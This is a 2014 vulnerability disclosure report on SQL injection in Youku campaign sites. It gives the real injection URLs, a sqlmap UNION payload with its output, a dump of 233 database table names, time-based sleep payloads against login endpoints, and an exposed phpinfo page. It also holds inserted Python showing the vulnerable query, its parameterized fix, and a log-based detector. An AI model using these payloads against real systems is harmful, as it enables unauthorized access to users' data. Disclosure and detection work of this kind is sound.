A SQL injection point on a Youku site

Vulnerability details

Disclosure status:

2014-03-01: Details reported to the vendor; awaiting the vendor's handling
2014-03-01: Vendor has confirmed; details disclosed to the vendor only
2014-03-11: Details disclosed to core white hats and experts in related fields
2014-03-21: Details disclosed to regular white hats
2014-03-31: Details disclosed to intern white hats
2014-04-15: Details disclosed to the public

Brief description:

SQL injection on a Youku campaign site; the account information of a large number of users who took part in the campaigns is exposed.
== Serves you right for chasing freebies

Detailed description:

Injection point: events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1

Injected parameter: uid



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#
---

available databases [3]:
[*] db_events
[*] information_schema
[*] test

Database: db_events
[233 tables]
+--------------------------+
| 7up_user |
| adidas_2010_football |
| adidas_2011_tvc_info |
| adidas_comments |
| aveo_clicks |
| aveo_comments |
| aveo_users |
| bosideng_1024_users |
| bosideng_code |
| bosideng_fake_users |
| bosideng_photos |
| bosideng_users |
| bosideng_video_vote_logs |
| bosideng_videos |
| bosideng_vote_logs |
| bsd_kpi_email |
| bsd_kpi_user |
| bsd_rt_log |
| bsd_user |
| bugles_videos |
| casesharing_2013 |
| cgirl2014_awards |
| chengxin_news |
| chery_comments |
| chery_photo_vote_logs |
| chery_photos |
| chery_users |
| chery_video_vote_logs |
| chery_videos |
| cityshow_comment |
| cityshow_data |
| cityshow_member |
| clear_game_log |
| clear_log |
| clear_rt_log |
| clear_users |
| crowneplaza_register |
| deyi_tickets_users |
| dove_user |
| dove_video |
| etam_comment |
| etam_txt |
| fiesta_2011_guestbook |
| fm_dream |
| fm_kpi_member |
| fm_number |
| fm_number_bak |
| fm_number_t |
| fm_number_test |
| fm_support_log |
| fm_user |
| fm_vote_log |
| fm_work |
| global_accounts |
| global_china |
| global_files |
| global_minisites |
| global_testing |
| global_units |
| greetingcard_params |
| gucci_comments |
| gucci_rt_logs |
| gucci_users |
| hkdl_users |
| ht_config |
| ht_guest |
| ht_user |
| htc_config |
| hvsop2013_awards |
| hvsop_comments |
| hvsop_live_email |
| hvsop_resumes |
| hvsop_users |
| hvsop_videos |
| hvsop_vote_logs |
| icedew_videos |
| jasmine_comments |
| jw2ask_marked |
| jw2ask_plans |
| jw2ask_questions |
| jw2ask_same_q |
| jw2ask_top30_grade_logs |
| kohler_comments |
| kohler_mm_awards |
| kohler_photo_vote_logs |
| kohler_photos |
| kohler_prize_logs |
| kohler_users |
| kohler_video_vote_logs |
| kohler_videos |
| lee_moment_photos |
| lee_moment_votelog |
| levis_data |
| levis_logs |
| levis_win |
| loreal_flash_ad |
| mabelline_users |
| mamonde_2013_videos |
| market_huanzhu_votes |
| marketing_apply_info |
| marketing_darenxiu |
| marketing_fashion |
| marketing_jianjiancao |
| marketing_kfc_avatar |
| marketing_kfc_cms |
| marketing_laifushi |
| marketing_upload_info |
| mql_award |
| mql_seckill |
| mql_seckill_bak |
| mql_seckill_log |
| nikegz_comments |
| nikegz_image |
| nikegz_pks |
| nikegz_videos |
| nivea_answer_logs |
| nivea_awards |
| nivea_final_awards |
| nivea_photos |
| nivea_question |
| nivea_users |
| nivea_vote_logs |
| onstar_regist |
| onstar_video |
| oreo_images |
| oreo_videos |
| pepsi_comments |
| pepsi_ecards |
| pepsi_media |
| pepsi_users |
| pepsi_videos |
| pepsi_vote_logs |
| pepsicny_videos |
| qingyang_comment |
| qingyang_videos |
| remyvsop_banner |
| remyvsop_comment |
| remyvsop_mobile |
| remyvsop_news |
| remyvsop_register |
| remyvsop_teams |
| remyvsop_videos |
| ricola_pincode |
| ricola_tickets |
| roewe_comment |
| roewe_config |
| roewe_guess |
| roewe_player |
| roewe_user |
| scj_users |
| sprite_users |
| sprite_videos |
| superb_comments |
| superb_comments_bak |
| superb_videos |
| sww_2011_users |
| sww_2011_videos |
| unit_cachedata |
| unit_comments |
| unit_misc |
| unit_news |
| unit_users |
| unit_videos |
| unit_visitors |
| unit_voting |
| vichy2013_awards |
| vichy2013_winners |
| videos_bak |
| vsop_email |
| vsop_live_mobile |
| vsop_loop_videos |
| vsop_lyp |
| vsop_users |
| vsop_videos |
| vsop_vote_email |
| wtcc_2011_guestbook |
| wtcc_2011_shots |
| wtcc_2011_users |
| wzmt_awards |
| wzmt_awards_bak |
| wzmt_seckill |
| wzmt_seckill_log |
| z_acer_user |
| z_bwnzb_user |
| z_eleven_user |
| z_fanta |
| z_fanta_email |
| z_ferrari |
| z_ferrero_user |
| z_huggies |
| z_huggies_comments |
| z_k3 |
| z_k3_user |
| z_k3_v |
| z_lenscrafter_pic |
| z_lenscrafter_user |
| z_loreal |
| z_market_disney |
| z_market_topchef |
| z_proya2011_100 |
| z_proya2011_code |
| z_proya2011_mblog |
| z_proya2011_pic |
| z_proya2011_user |
| z_proya2011_v2_pic |
| z_proya2011_v2_user |
| z_proya_pic |
| z_proya_user |
| z_remyclub_comment |
| z_remyclub_user |
| z_riich_user |
| z_sdeer_user |
| z_sepb_user |
| z_sgm15th |
| z_volvo |
| z_wp_code |
| z_young |
| z_z_comment |
| z_z_contact |
| z_z_contact2 |
| z_z_email |
| z_z_img |
| z_z_luck |
| z_z_module_luck |
| z_z_p |
| z_z_txt |
| z_z_txt_vote |
| z_z_v |
| z_z_vote |
| z_z_vote_id |
| z_z_vote_ip |
| zhijue_users |
| zqbb_videos |
+--------------------------+
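The root cause behind the uid finding above, as an added illustration that is not code from the report or from Youku: the real handler is PHP and its schema is not on the page, so the sqlite3-backed Python below, its table and column names, and the sample rows are all assumptions. The vulnerable handler pastes the parameter into the SQL text, which is why a UNION appended to it runs as part of the query; the fixed handler binds it as a parameter and validates it as an integer first.

```python
import sqlite3

# Constructed sample data standing in for the campaign site's e-card storage
# (assumed table and column names; nothing here comes from the real site).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ecards (id INTEGER, uid INTEGER, title TEXT)")
    conn.execute("CREATE TABLE users (uid INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO ecards VALUES (?, ?, ?)",
                     [(1, 1, "card-a"), (2, 2, "card-b")])
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "alice@example.invalid"),
                      (2, "bob", "bob@example.invalid")])
    return conn

def my_ecards_vulnerable(conn, uid):
    # The request parameter becomes part of the SQL text, so whatever it
    # contains is parsed as SQL; this is the pattern sqlmap found above.
    sql = "SELECT id, uid, title FROM ecards WHERE uid = " + str(uid)
    return conn.execute(sql).fetchall()

def my_ecards_fixed(conn, uid):
    # 1) Validate the type: uid is an integer id, anything else is rejected.
    uid = int(uid)  # raises ValueError for non-integer input
    # 2) Bind it: the value travels to the engine separately from the SQL
    #    and can never change the query's structure.
    sql = "SELECT id, uid, title FROM ecards WHERE uid = ?"
    return conn.execute(sql, (uid,)).fetchall()

# Constructed probe value modelled on the UNION technique in the sqlmap
# output above (simplified for sqlite, which lacks MySQL's # comment).
PAYLOAD = "1 UNION ALL SELECT NULL, username, email FROM users"

def probe(conn, handler, uid):
    """Rows a handler returns for a given uid value, or -1 if it rejected it."""
    try:
        return len(handler(conn, uid))
    except (ValueError, sqlite3.Error):
        return -1

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, uid=1      :", probe(db, my_ecards_vulnerable, "1"))
    print("vulnerable, uid=PAYLOAD:", probe(db, my_ecards_vulnerable, PAYLOAD))
    print("fixed,      uid=1      :", probe(db, my_ecards_fixed, "1"))
    print("fixed,      uid=PAYLOAD:", probe(db, my_ecards_fixed, PAYLOAD))
```

Against the vulnerable handler the probe value returns the user's own card plus every row of the users table; against the fixed handler it is rejected before any SQL runs, and a plain uid returns exactly that user's rows. Binding alone would already be enough; the integer check is there so the endpoint also refuses garbage early instead of passing it to the database.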





Heh, there are also a few POST injection points. Common tools can't extract results from them, but a time delay confirms they exist.



http://events.youku.com/bwnzb/api/_login.php

uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e



http://events.youku.com/bwnzb/phase-2/api/_login.php

uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e



http://events.youku.com/familymart/api/?q=ajax/doSupport

type=(select(sleep(3))v)&work_id=24526

or type=test&work_id=(select(sleep(3))v)
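For the time-based POST points, as an added detection example that is not part of the original report: the sleep()/XOR requests above leave two signals in a web access log, the function names inside the request and a response time that matches the requested delay. The Python below scans constructed log lines modelled on those requests; the log format (client, method, path, quoted body, status, response milliseconds) and the lines themselves are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Patterns taken from the payload shapes above (sleep, XOR inside a comment,
# UNION ... SELECT) plus the usual siblings of the time-based functions.
TIME_BASED = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I)
UNION_BASED = re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)
COMMENT_XOR = re.compile(r"/\*.*?\*/|\bxor\s*\(", re.I | re.S)

# Constructed log format: client method path "body" status response_ms
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" (\d{3}) (\d+)$')

# Constructed sample lines modelled on the requests in the report.
SAMPLE_LOG = [
    '10.0.0.5 POST /bwnzb/api/_login.php '
    '"uname=/*\'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR\'*/&upass=e" 200 1043',
    '10.0.0.5 POST /familymart/api/?q=ajax/doSupport '
    '"type=(select(sleep(3))v)&work_id=24526" 200 3012',
    '10.0.0.9 GET /2011/pepsihappyness/api/?act=my_ecards&uid=1%20UNION%20ALL%20SELECT%20NULL,NULL '
    '"" 200 38',
    '10.0.0.7 GET /2011/pepsihappyness/api/?act=my_ecards&uid=1 "" 200 21',
]

def decode(value, rounds=2):
    # URL-decode until stable (bounded), so %2c-separated arguments such as
    # sleep(1)%2c0 are inspected in their decoded form.
    for _ in range(rounds):
        new = unquote_plus(value)
        if new == value:
            break
        value = new
    return value

def classify(raw):
    """Return the list of injection indicators found in a request string."""
    text = decode(raw)
    hits = []
    if TIME_BASED.search(text):
        hits.append("time-based")
    if UNION_BASED.search(text):
        hits.append("union-based")
    if COMMENT_XOR.search(text):
        hits.append("comment/xor")
    return hits

def scan(log_lines, slow_ms=1000):
    """Flag lines carrying injection indicators; note whether the response was slow.

    A time-based hit together with a slow response is the strongest signal that
    the injected delay actually executed on the database."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # line not in the expected format; skip rather than guess
        client, method, path, body, status, ms = m.groups()
        hits = classify(path + " " + body)
        if hits:
            findings.append({"line": n, "client": client, "path": path,
                             "hits": hits, "slow": int(ms) >= slow_ms})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Lines 1 and 2 are flagged as time-based with slow responses, line 3 as union-based, and the plain uid=1 request is left alone. The keyword patterns on their own will false-positive on legitimate text that happens to contain "union" or "sleep", so in practice the slow-response correlation, not the keyword match, should decide what gets paged.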



Bonus: a phpinfo

http://events.youku.com/2010/wtcc/phpinfo.php

Proof of vulnerability:


Fix recommendation:

Copyright notice: when reposting, please credit the source Mr .LZH@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed at: 2014-03-01 20:08

Vendor reply:

Thanks for the heads-up, we'll fix it right away

Latest status:

None yet


Vulnerability rating: